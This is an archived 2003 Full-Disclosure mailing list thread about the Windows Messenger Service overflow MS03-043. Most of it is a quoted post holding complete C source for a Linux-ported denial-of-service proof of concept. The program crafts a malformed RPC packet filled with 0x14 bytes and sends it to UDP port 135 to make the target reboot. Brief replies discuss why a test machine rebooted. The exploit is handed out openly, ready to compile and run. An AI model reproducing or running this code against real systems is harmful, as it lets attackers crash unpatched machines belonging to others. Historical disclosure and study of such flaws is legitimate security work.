Full Disclosure mailing list archives

Re: Linux Ported Version of MS03-043 DOS

From: "Dowling, Gabrielle" <dowlingg () sullcrom com>
Date: Mon, 20 Oct 2003 00:52:54 -0400
Then I don't understand what you're talking about?  You have a win2k system that you haven't patched in ages and it 
rebooted when you threw. an exploit against it?

My initial query was because the messenger service has an rpc service that I'm not fully familiar with, buti would 
expect it to behave in accordance with rpc in general, which on win2k is to do nothing, rather than reboot.

If the exploit is somehow causing a reboot apart from rpc service default behavior (which can be changed) it would be 
good to learn how.

G

 -----Original Message-----
From:   VeNoMouS [mailto:venom () gen-x co nz]
Sent:   Mon Oct 20 00:34:53 2003
To:     Dowling, Gabrielle; full-disclosure () lists netsys com
Subject:        Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

to tell u the true, i ant a wintendo whore, i just applied patches ages ago,
but basicly what i got was the popup box up with your box is rebooting in 59
seconds crap, im not a wintendo admin, nor do i calim to be im only a *nix
coder && admin.


----- Original Message ----- 
From: "Dowling, Gabrielle" <dowlingg () sullcrom com>
To: "VeNoMouS" <venom () gen-x co nz>; <full-disclosure () lists netsys com>
Sent: Monday, October 20, 2003 5:28 PM
Subject: RE: [Full-disclosure] Linux Ported Version of MS03-043 DOS


Was the win2k system you tested on set to have the rpc service reboot on
fail, or was the reboot caused by some other oddity?

G

 -----Original Message-----
From: VeNoMouS [mailto:venom () gen-x co nz]
Sent: Sun Oct 19 22:22:51 2003
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Linux Ported Version of MS03-043 DOS

Here you go guys or get it via www.gen-x.co.nz/ms03-043.c

<<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

/*
Mon Oct 20 14:26:55 NZDT 2003

Re-written By VeNoMouS to be ported to linux, and tidy it up a little.
This was only like a 5 minute port but it works and has been tested.
venom () gen-x co nz

greets to str0ke and defy


DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that
when

a character 0x14 in encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the
size
of the string, which is the way to go, but is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length
checks

and overflow the fixed size buffer.

Credits go to LSD :)

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>





// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length


int usage(char *name)
{
 printf("Proof of Concept for Windows Messenger Service Overflow..\n");
 printf("- Originally By Hanabishi Recca - recca () mail ru\n\n");
 printf("- Ported to linux by VeNoMouS..\n");
 printf("- venom () gen-x co nz\n\n\n");

 printf("example : %s -d yourputtersux -i 10.33.10.4 -s
n0nlameputer\n",name);
 printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
 printf("-s <src netbios name>\n");
 return 1;
}


int main(int argc,char *argv[])
{
        int i, packet_size, fields_size, s;
        unsigned char packet[8192];
        struct sockaddr_in addr;
  char from[57],machine[57],c;
        char body[4096] = "*** MESSAGE ***";

  if(argc <= 2)
  {
  usage(argv[0]);
  exit(0);
  }

    while ((c = getopt (argc, argv, "d:i:s:h")) != EOF)
  switch(c)
   {
   case 'd':
      strncpy(machine,optarg,sizeof(machine));
      printf("Machine is %s\n",machine);
      break;
   case 'i':
            memset(&addr, 0,sizeof(addr));
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = inet_addr(optarg);
            addr.sin_port = htons(135);
      break;
   case 's':
            strncpy(from,optarg,sizeof(from));
      break;

   case 'h':
      usage(argv[0]);
      exit(0);
      break;
   }

        // A few conditions :
        // 0 <= strlen(from) + strlen(machine) <= 56
        // max fields size 3992

  if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n");
exit(0); }

        if(!strlen(machine)) { printf("Ummmm we also need the dest netbios
name bro...\n"); exit(0); }

  if(!strlen(from)) strcpy(from,"tolazytotype");

        memset(packet,0, sizeof(packet));
        packet_size = 0;

        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) -
1);
        packet_size += sizeof(packet_header) - 1;

        i = strlen(from) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) -
1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], from);
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of
4

        i = strlen(machine) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) -
1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], machine);
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of
4

        fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
        memset(body, 0x14, sizeof(body));
        body[3992 - packet_size + sizeof(packet_header) -
sizeof(field_header) - 1] = '\0';

        i = strlen(body) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) -
1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], body);
        packet_size += i;

        fields_size = packet_size - (sizeof(packet_header) - 1);
        *(unsigned int *)(&packet[40]) = time(NULL);
        *(unsigned int *)(&packet[74]) = fields_size;

        fprintf(stdout, "Total length of strings = %d\nPacket size =
%d\nFields size = %d\n", strlen(from) + strlen(machine) +
strlen(body),packet_size, fields_size);


 if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 )
  {
   perror("Error socket() - ");
   exit(0);
  }

        if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr,
sizeof(addr)) == -1)
  {
   perror("Error sendto() - ");
   exit(0);
  }


        exit(0);
}




**********************************************************************
This e-mail is sent by a law firm and contains information
that may be privileged and confidential. If you are not the
intended recipient, please delete the e-mail and notify us
immediately.
***********************************************************************





**********************************************************************
This e-mail is sent by a law firm and contains information
that may be privileged and confidential. If you are not the 
intended recipient, please delete the e-mail and notify us 
immediately. 
***********************************************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:

Linux Ported Version of MS03-043 DOS VeNoMouS (Oct 19)
- Re: Linux Ported Version of MS03-043 DOS VeNoMouS (Oct 19)
- <Possible follow-ups>
- RE: Linux Ported Version of MS03-043 DOS Dowling, Gabrielle (Oct 19)
  - Re: Linux Ported Version of MS03-043 DOS VeNoMouS (Oct 19)
- Re: Linux Ported Version of MS03-043 DOS Dowling, Gabrielle (Oct 19)
  - Re: Linux Ported Version of MS03-043 DOS Paul Tinsley (Oct 20)
- Re: Linux Ported Version of MS03-043 DOS Gordon, Mike (Oct 20)
- RE: Linux Ported Version of MS03-043 DOS Perrymon, Josh L. (Oct 20)
  - RE: Linux Ported Version of MS03-043 DOS Frank Knobbe (Oct 20)
  - Re: Linux Ported Version of MS03-043 DOS VeNoMouS (Oct 20)